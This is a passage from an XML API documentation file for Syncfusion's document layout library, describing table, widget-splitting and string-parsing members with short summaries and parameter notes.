        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdateLeafWidgetWidth(System.Double,Syncfusion.Layouting.IWidget)">
            <summary>
            Update Width of the LeafWidget
            </summary>
            <param name="width"></param>
            <param name="widget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedToAddCellBounds(Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Determines whether the cell bounds need to add the left area bounds.
            </summary>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.SplitUpWidget(Syncfusion.Layouting.ISplitLeafWidget,System.Single)">
            <summary>
            Splits up widget.
            </summary>
            <param name="splitLeafWidget">The split leaf widget.</param>
        </member>
        <member name="P:Syncfusion.Layouting.LeafLayoutContext.LeafWidget">
            <summary>
            Gets the leaf widget.
            </summary>
            <value>The leaf widget.</value>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.Layouting.SortPointByX.Compare(System.Drawing.PointF,System.Drawing.PointF)" -->
        <member name="T:Syncfusion.Layouting.LCTable">
            <summary>
            Represents the layout context for tables.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LCTable.DEF_MIN_WIDTH">
            <summary>
            The minimum width.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.#ctor(Syncfusion.Layouting.SplitTableWidget,Syncfusion.Layouting.ILCOperator)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LCTable"/> class.
            </summary>
            <param name="splitWidget">The split widget.</param>
            <param name="lcOperator">The lc operator.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.#ctor(Syncfusion.Layouting.ITableWidget,Syncfusion.Layouting.ILCOperator)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LCTable"/> class.
            </summary>
            <param name="table">The table.</param>
            <param name="lcOperator">The lc operator.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.Layout(System.Drawing.RectangleF)">
            <summary>
            Layouts the specified widget.
            </summary>
            <param name="rect">The rect.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsLayoutedFloatingTableInTextBodyItems">
            <summary>
            Determines whether the layouted floating table in text body items.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsLayoutedFloatingTableInWTablacell">
            <summary>
            Determines whether the layouted floating table in tablacell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetLayoutedFloatingTable">
            <summary>
            Gets the layouted floatting table.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.FootnoteRowLayouting">
            <summary>
            If footnote preserved in the the adjacent cell this layouting will perform
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsAdjacentCellHasFootnote">
            <summary>
            Checks After zero cell has Footnote and returns the bool Value
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.RemoveFootnoteFromLayouter">
            <summary>
            Removes the Footnote already layouted for the current table
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateTableLWBounds">
            <summary>
            Updates the table LW bounds.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.RelayoutingTable">
            <summary>
            Split the row when it exceeds the page margin bottom for Word 2013
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateTableKeepWithNext">
            <summary>
            Update KeepWithNext property set for the Table
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateAbsoluteTablePosition">
            <summary>
            Update absolute table position
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.AdjustClientAreaBasedOnTextWrap(System.Drawing.SizeF,System.Drawing.RectangleF@)">
            <summary>
            Adjust Client Area for Text Wrapping
            </summary>
            <param name="size">Size</param>
            <param name="rect">The rect</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetFirstRowWidth">
            <summary>
            Get the First row width
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetMaxCellHeight(System.Single)">
            <summary>
            Get the First row maximum cell width
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CreateRowLayoutedWidget">
            <summary>
            Creates the row layouted widget.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetTotalTopMarginAndPaddingValues(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Calculates the total padding and margin values for nested table.
            </summary>
            <param name="table">The current table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.LayoutRow(Syncfusion.Layouting.IWidget)">
            <summary>
            Layouts the row.
            </summary>
            <param name="rowWidget">The row widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsRowSplitByPageBreakBefore(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            To ensure the first pargraph inside the cell is having page break before property
            </summary>
            <param name="tableRow"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CheckFootnoteInRowIsSplitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Checks the footnote in row is splitted.
            </summary>
            <param name="childContext">The child context.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CreateRowLayoutArea(Syncfusion.DocIO.DLS.WTableRow,System.Single)">
            <summary>
            Creates the row layout area.
            </summary>
            <param name="row">The row.</param>
            <param name="bottomPad">The bottom pad.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetCellsMaxTopAndBottomPadding(Syncfusion.DocIO.DLS.WTableRow,System.Single@,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the cells maximum top and bottom padding.
            </summary>
            <param name="row">The row.</param>
            <param name="maxTopPading">The maximum top pading.</param>
            <param name="maxBottomPadding">The maximum bottom padding.</param>
            <param name="maxTopMargin">The maximum top margin.</param>
            <param name="maxBottomMargin">The maximum bottom margin.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsFirstRowOfSplittedTable">
            <summary>
            To identify whether the current row is first row of splitted table
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateCellsMaxTopAndBottomPadding(Syncfusion.DocIO.DLS.WTableRow,System.Single,System.Single)">
            <summary>
            Updates the cells maximum top and bottom padding.
            </summary>
            <param name="row">The row.</param>
            <param name="maxTopPading">The maximum top pading.</param>
            <param name="maxBottomPading">The maximum bottom pading.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateCellsBottomPaddingAndMargin(Syncfusion.DocIO.DLS.WTableRow,System.Single,System.Single)">
            <summary>
            Updates the cells bottom padding and margin.
            </summary>
            <param name="row">The row.</param>
            <param name="maxBottomPading">The maximum bottom pading.</param>
            <param name="maxBottomMargin">The maximum bottom margin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CommitRow">
            <summary>
            Commits the row.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsNeedToLayoutHeaderRow">
            <summary>
            Check whether current row vertical merged cell layouted or not
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateVerticalMergedCell(Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Updates the vertically merged cell.
            </summary>
            <param name="rowLW">The row lw.</param>
            <param name="isNextRowNotFitted">if set to <c>true</c> [is next row not fitted].</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateSplittedVerticalMergeCell(Syncfusion.Layouting.LayoutContext,Syncfusion.Layouting.LayoutedWidget,Syncfusion.Layouting.RowLayoutInfo,Syncfusion.Layouting.LayoutedWidget,Syncfusion.Layouting.LayoutedWidget,System.Int32,System.Boolean)">
            <summary>
            Updates the splitted vertical merge cell.
            </summary>
            <param name="lc">The lc.</param>
            <param name="mergeStartLW">The merge start lw.</param>
            <param name="rowInfo">The row information.</param>
            <param name="childLW">The child lw.</param>
            <param name="rowLW">The row lw.</param>
            <param name="currentIndex">Index of the current.</param>
            <param name="isNextRowNotFitted">if set to <c>true</c> [is next row not fitted].</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetVerticalMergeStartLW(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Gets the vertical merge start lw.
            </summary>
            <param name="verticalMergeEndLW">The vertical merge end lw.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateVerticalTextCellLW">
            <summary>
            Updates the vertical text cell lw.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateSplittedCells">
            <summary>
            Updates the splitted cells.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetChildParaWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Retreive first pagragraph present in the first cell of the current row
            </summary>
            <returns>paragraph widget of first cell</returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetChildParagraphWidgets(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Retreive pagragraphs present in the cells.
            </summary>
            <returns>paragraph widget of cells</returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsTableWidget(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether the given widget is Table widget or not.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsNotEmptySplittedCell">
            <summary>
            Determine whether the splitted cells are not empty
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsRowNeedToBeSplitted">
            <summary>
            Determine Whether the row need to be splitted across pages.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateRowLWBounds">
            <summary>
            Updates the row layouted widget bounds.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.NextRowIndex">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.LayoutHeaderRow(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Layouts the header rows
            </summary>
            <param name="row">header row</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateHeaderRowWidget">
            <summary>
            Update Header Row Widget
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsInFrame">
            <summary>
            Determines whether [is in frame] [the specified table].
            </summary>
            <param name="table">The table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateCellHeight(System.Int32)">
            <summary>
            Updates the height of the cell.
            </summary>
            <param name="column">The column.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateVerticalCellAlignment(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Updates the Y position of cell widget child items based on cell vertical alignment
            </summary>
            <param name="cellLW">Current layouted cell widget</param>
            <param name="tableInfo">Cell widget layout info</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateVerticalTextCellAlignment(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Updates the Y position of cell widget child items based on cell vertical alignment
            </summary>
            <param name="cellLW">The cell lw.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetDisplacementValue(Syncfusion.Layouting.LayoutedWidget,System.Single,System.Boolean,System.Single)">
            <summary>
            Calculate the displacement value based on cell vertical alignment
            </summary>
            <param name="child">Current cell textbody widget</param>
            <param name="bounds">Current cell height</param>
            <param name="isRemainingSpace">Set to <c>true</c> when the cell child items bottom greter than cell bottom</param>
            <param name="remainingSpace">Remaining space value</param>
            <returns>displacement value</returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsCellHavingShapes(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            To identify whether cell is having shape related items or not.
            </summary>
            <param name="child">Current cell widget</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.FindMaximumBottomOfFloattingItem(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Finds the maximum bottom of floatting item.
            </summary>
            <param name="child">The child.</param>
            <returns></returns>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.Layouting.LCTable.IsLayoutedWidgetNeedToBeShifted(Syncfusion.DocIO.DLS.TextWrappingStyle,System.Drawing.RectangleF,System.Drawing.RectangleF,System.Single,System.Single,System.Single,System.Single,Syncfusion.DocIO.DLS.CompatibilityMode,System.Boolean)" -->
        <member name="M:Syncfusion.Layouting.LCTable.CreateTableClientArea(System.Drawing.RectangleF@)">
            <summary>
            Creates the table client area.
            </summary>
            <param name="rect">The rect.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.LayoutCell(Syncfusion.Layouting.LayoutContext,System.Drawing.RectangleF,System.Boolean)">
            <summary>
            Does the layout cell.
            </summary>
            <param name="childContext">The child context.</param>
            <param name="cellArea">The cell area.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CompareOwnerOfTableCell(Syncfusion.DocIO.DLS.WTableRow,Syncfusion.Layouting.FloatingItem)">
            <summary>
            Check whether the owner row of current cell is same as owner row of floating item
            </summary>
            <param name="CurrentRow"></param>
            <param name="Item"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.AddVerticallyMergedCellFootNote(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Checks the foot note in text body.
            </summary>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.AddVerticallyMergedCellFootNote(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks the foot note in paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CreateNextCellContext">
            <summary>
            Creates the next cell context.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.SaveChildContextState(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Commits the cell context.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.MarkAsSplitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as splitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.MarkAsBreaked(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as breaked.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.MarkAsNotFitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as not fitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CommitKeepWithNext">
            <summary>
            Commits the keep with next.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.IsNeedToCommitKeepWithNext(System.Boolean@)">
            <summary>
            Determine whether current row widget is need to commit with keeepWithNext property
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.MarkAsFitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Marks as fitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateClientArea">
            <summary>
            Updates the client area.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetFootnoteHeight(System.Single@)">
            <summary>
            Get the footnote textbody height
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetCellClientArea(Syncfusion.Layouting.CellLayoutInfo,System.Int32,System.Int32,System.Single,System.Single)">
            <summary>
            Gets the cell client area.
            </summary>
            <param name="horMergeStart">if set to <c>true</c> [hor merge start].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetCellWidth(System.Int32,System.Int32)">
            <summary>
            Gets the width of the cell.
            </summary>
            <param name="rowIndex">Row index</param>
            <param name="colIndex">Column index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetCellHeight(System.Int32,System.Int32,System.Single)">
            <summary>
            Gets the Height of the cell.
            </summary>
            <param name="rowIndex">Row index</param>
            <param name="colIndex">Column index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetCellMergedWidth(System.Int32,System.Int32)">
            <summary>
            Gets the width of the merged cell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.UpdateLWBounds">
            <summary>
            Updates the LW bounds.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.CorrectTableClientArea(System.Drawing.RectangleF@)">
            <summary>
            Corrects the table client area.
            </summary>
            <param name="rect">The rect.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetMinimumRightPad">
            <summary>
            Get Minimum right padding of the table.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCTable.GetRightPad(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get Right padding of the cell
            </summary>
            <param name="tableCell"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.LCTable.TableLayoutInfo">
            <summary>
            Gets the table layout info.
            </summary>
            <value>The table layout info.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LCTable.TableWidget">
            <summary>
            Gets the table widget.
            </summary>
            <value>The table widget.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LCTable.CurrRowIndex">
            <summary>
            Gets the index of the curr row.
            </summary>
            <value>The index of the curr row.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LCTable.LeftPad">
            <summary>
            Gets the left pad for table.
            </summary>
            <value>The left pad.</value>
        </member>
        <member name="T:Syncfusion.Layouting.LeafEmtyWidget">
            <summary>
            Summary description for LeafEmtyWidget.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafEmtyWidget.#ctor(System.Drawing.SizeF)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LeafEmtyWidget"/> class.
            </summary>
            <param name="size">The size.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafEmtyWidget.Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures the specified graphics.
            </summary>
            <param name="graphics">The graphics.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafEmtyWidget.Draw(Syncfusion.DocIO.Rendering.DrawingContext,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw range to graphics.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafEmtyWidget.InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafEmtyWidget.InitLayoutInfo(Syncfusion.Layouting.IWidget)">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LeafEmtyWidget.LayoutInfo">
            <summary>
            Gets layout info.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.SplitTableWidget">
            <summary>
            Summary description for SplitTableWidget.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.SplitTableWidget.#ctor(Syncfusion.Layouting.ITableWidget,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:SplitTableWidget"/> class.
            </summary>
            <param name="tableWidget">The table widget.</param>
            <param name="rowNumber">The row number.</param>
        </member>
        <member name="M:Syncfusion.Layouting.SplitTableWidget.#ctor(Syncfusion.Layouting.ITableWidget,System.Int32,Syncfusion.Layouting.SplitWidgetContainer[])">
            <summary>
            Initializes a new instance of the <see cref="T:SplitTableWidget"/> class.
            </summary>
            <param name="tableWidget">The table widget.</param>
            <param name="rowNumber">The row number.</param>
            <param name="splittedCells">The row number.</param>
        </member>
        <member name="M:Syncfusion.Layouting.SplitTableWidget.#ctor(Syncfusion.Layouting.ITableWidget,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:SplitTableWidget"/> class.
            </summary>
            <param name="tableWidget">The table widget.</param>
            <param name="rowNumber">The row number.</param>
            <param name="colNumber">The column number.</param>
        </member>
        <member name="M:Syncfusion.Layouting.SplitTableWidget.Draw(Syncfusion.DocIO.Rendering.DrawingContext,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw range to graphics.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.SplitTableWidget.InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.SplitTableWidget.TableWidget">
            <summary>
            Gets the table widget.
            </summary>
            <value>The table widget.</value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitTableWidget.StartRowNumber">
            <summary>
            Gets the start row number.
            </summary>
            <value>The start row number.</value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitTableWidget.StartColumnNumber">
            <summary>
            Gets the start column number.
            </summary>
            <value>The start column number.</value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitTableWidget.SplittedCells">
            <summary>
            Gets the splitted cells.
            </summary>
            <value>The splitted cells.</value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitTableWidget.LayoutInfo">
            <summary>
            Gets layout info.
            </summary>
            <value></value>
        </member>
        <member name="T:Syncfusion.Layouting.SplitWidgetContainer">
            <summary>
            Summary description for SplitWidgetContainer.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.SplitWidgetContainer.#ctor(Syncfusion.Layouting.IWidgetContainer)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.SplitWidgetContainer"/> class.
            </summary>
            <param name="container">The container.</param>
        </member>
        <member name="M:Syncfusion.Layouting.SplitWidgetContainer.#ctor(Syncfusion.Layouting.IWidgetContainer,Syncfusion.Layouting.IWidget,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.SplitWidgetContainer"/> class.
            </summary>
            <param name="container">The container.</param>
            <param name="currentChild">The current child.</param>
            <param name="firstIndex">Index of the first.</param>
        </member>
        <member name="M:Syncfusion.Layouting.SplitWidgetContainer.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.SplitWidgetContainer.Syncfusion#Layouting#IWidget#InitLayoutInfo(Syncfusion.Layouting.IWidget)">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.SplitWidgetContainer.RealWidgetContainer">
            <summary>
            Gets the real widget container.
            </summary>
            <value>The real widget container.</value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitWidgetContainer.LayoutInfo">
            <summary>
            Gets layout info.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitWidgetContainer.Count">
            <summary>
            Gets count of child widgets.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitWidgetContainer.Item(System.Int32)">
            <summary>
            Gets child widget by index.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitWidgetContainer.WidgetInnerCollection">
            <summary>
            Get child widgets
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.SplitStringWidget">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.SplitStringWidget.#ctor(Syncfusion.Layouting.IStringWidget,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.SplitStringWidget"/> class.
            </summary>
            <param name="strWidget">The STR widget.</param>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.Layouting.SplitStringWidget.GetText">
            <summary>
            Gets the text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.SplitStringWidget.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.SplitStringWidget.SplitBySize(Syncfusion.DocIO.Rendering.DrawingContext,System.Drawing.SizeF,System.Single,System.Single,System.Boolean@,System.Boolean,System.Boolean)">
            <summary>
            Splits the size of the by.
            </summary>
            <param name="graphics">The graphics.</param>
            <param name="offset">The offset.</param>
            <param name="clientWidth">The clientWidth.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.SplitStringWidget.Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures the specified graphics.
            </summary>
            <param name="graphics">The graphics.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.SplitStringWidget.SplitBySize(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,Syncfusion.Layouting.IStringWidget,Syncfusion.Layouting.SplitStringWidget,System.Single,System.Single,System.Boolean@,System.Boolean,System.Boolean)">
            <summary>
            Splits the by offset.
            </summary>
            <param name="graphics">The graphics.</param>
            <param name="offset">The offset.</param>
            <param name="strWidget">The STR widget.</param>
            <param name="splitStringWidget">The splitted text.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.SplitStringWidget.IsTrailSpacesWrapped">
            <summary>
            Gets or sets a value indicating whether the trail spaces wrapped or not.
            </summary>
            <value>
            <c>true</c> if this instance is trail spaces wrapped; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitStringWidget.SplittedText">
            <summary>
            Gets and sets the Splitted Text
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.SplitStringWidget.RealStringWidget">
            <summary>
            Gets the real string widget.
            </summary>
            <value>The real string widget.</value>
        </member>
        <member name="P:Syncfusion.Layouting.SplitStringWidget.LayoutInfo">
            <summary>
            Gets layout info.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.StringParser">
            <summary>
            Utility class for working with strings.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.WhiteSpace">
            <summary>
            Whitespace symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.Tab">
            <summary>
            Whitespace symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.Hyphen">
            <summary>
            Hyphen symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.c_regexOptions">
            <summary>
            Default RegEx checks object's options.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.c_whiteSpacePatterm">
            <summary>
            Pattern for WhiteSpace.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.Spaces">
            <summary>
            Array of spaces.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.s_whiteSpaceRegex">
            <summary>
            Whitespace regex.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.m_text">
            <summary>
            Text data.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.StringParser.m_position">
            <summary>
            Current position.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.StringParser"/> class.
            </summary>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.GetCharsCount(System.String,System.Char)">
             <property name="flag" value="Finished" />
            
             <summary>
             Returns number of symbols occurred in the text.
             </summary>
             <param name="text">Text data.</param>
             <param name="symbol">Symbol to be searched.</param>
             <returns>
             Number of symbols occurred in the text.
             </returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.GetCharsCount(System.String,System.Char[])">
             <property name="flag" value="Finished" />
            
             <summary>
             Returns number of symbols occurred in the text.
             </summary>
             <param name="text">Text data.</param>
             <param name="symbols"> Array of symbols to be searched.</param>
             <returns>
             Number of symbols occurred in the text.
             </returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.ReadLine">
            <summary>
            Reads line of the text.
            </summary>
            <returns>Text line.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.PeekLine">
            <summary>
            Reads line of the text.
            </summary>
            <returns>Text line.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.ReadWord">
            <summary>
            reads a word from the text.
            </summary>
            <returns>A word from the data.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.PeekWord">
            <summary>
            Peeks a word from the text.
            </summary>
            <returns>A word from the data.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.Read">
            <summary>
            Reads char form the data.
            </summary>
            <returns>Char symbol.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.IsUnicodeChineseText(System.String)">
            <summary>
            To check the text is Chinese unicode character
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.Read(System.Int32)">
            <summary>
            Reads count of the symbols.
            </summary>
            <param name="count">Number of symbols.</param>
            <returns>String text.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.ReadToSymbol(System.Char,System.Boolean)">
            <summary>
            Reads data till the symbol.
            </summary>
            <param name="symbol">Specified symbol.</param>
            <param name="readSymbol">If true - to read the symbol.</param>
            <returns>The data read.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.Peek">
            <summary>
            Peeks char form the data.
            </summary>
            <returns>Char symbol.</returns>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.Close">
            <summary>
            Closes a reader.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.StringParser.ReadToEnd">
            <summary>
            Reads text to the end.
